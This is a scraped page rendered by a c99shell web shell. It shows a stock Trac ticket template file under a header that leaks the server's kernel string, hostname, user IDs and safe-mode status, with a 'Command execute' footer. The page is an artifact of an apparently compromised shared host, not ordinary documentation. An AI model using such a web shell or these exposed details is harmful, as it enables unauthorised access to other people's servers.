Software: Apache. PHP/8.3.27 uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364) Safe-mode: OFF (not secure) /usr/lib/python3/dist-packages/trac/ticket/templates/ drwxr-xr-x | |
| Viewing file: Select action/file-type: {# Copyright (C) 2010-2021 Edgewall Software This software is licensed as described in the file COPYING, which you should have received as part of this distribution. The terms are also available at https://trac.edgewall.org/wiki/TracLicense. This software consists of voluntary contributions made by many individuals. For the exact contribution history, see the revision history and logs, available at https://trac.edgewall.org/. #} ## Ticket Box (ticket fields along with description). # import 'macros.html' as jmacros with context {# Arguments: - ticket: the ticket to be shown - fields: ticket field metadata - description_change: metadata about changes in the description - can_append: True if the user is allowed to append to tickets - preview_mode: if True, show the "draft" background - hide=False: if True, hide the box - reporter_link=None: rendered link for the reporter field - owner_link=None: rendered link for the owner field #}
# if not ticket.exists and preview_mode:
${jmacros.warnings(chrome.warnings, 'trac-preview-warning')}
# endif
# if ticket.exists:
## use a placeholder if it's a new ticket
${tag_("Opened %(created)s", created=pretty_dateinfo(ticket.time))} # endif # if closetime:${tag_("Closed %(closed)s", closed=pretty_dateinfo(closetime))} # endif # if ticket.changetime != ticket.time and ticket.changetime != closetime:${ tag_("Last modified %(modified)s", modified=pretty_dateinfo(ticket.changetime)) } # endif # if not ticket.exists:${ _("(ticket not yet created)")} # endif#${ticket.id} ${'status' in fields and fields.by_name('status').rendered or ticket.status} # if ticket.type: ${'type' in fields and fields.by_name('type').rendered or ticket.type} # endif # if ticket.resolution: (${'resolution' in fields and fields.by_name('resolution').rendered or ticket.resolution}) # endif${ticket.summary} # if version is not none: # set version_link # if version == 0: ${_("Initial Version")} # else: ${ _("Version %(version)s", version=version)} # endif # endset # trans version_link — at ${version_link} # endtrans # endif
${_("Description")} # if description_change: # trans author = authorinfo(description_change.author) (last modified by ${author}) # endtrans # endif## Quote the description (only for existing tickets) # if ticket.exists and can_append: # endif # if ticket.description:
${wiki_to_html(context, ticket.description,
escape_newlines=preserve_newlines)}
# else:
# endif |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0107 ]-- |